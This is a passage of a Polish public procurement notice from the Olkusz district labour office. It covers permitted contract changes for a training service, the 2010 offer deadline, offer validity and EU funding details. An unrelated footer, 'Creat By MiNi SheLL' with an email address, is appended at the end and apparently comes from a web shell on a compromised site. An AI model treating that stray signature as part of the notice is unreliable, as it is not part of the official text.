<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość  zmiany  postanowień  umowy, której wzór stanowi załącznik nr 8a do SIWZ w przypadku:
1) zmiany  terminu przeprowadzenia szkolenia  - w obrębie 1- go miesiąca  dla danej grupy,
2) zmiany wykładowcy wynikającej  z przyczyn losowych ( za zgodą Zamawiającego ),
3) zmiany miejsca szkolenia ( za zgodą Zamawiającego ).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. pup-olkusz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy
ul. Minkiewicza 2
32-300 Olkusz
(Sekretariat - pokój nr 8).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy
ul. Minkiewicza 2
32-300 Olkusz
(Sekretariat - pokój nr 8).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego  z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com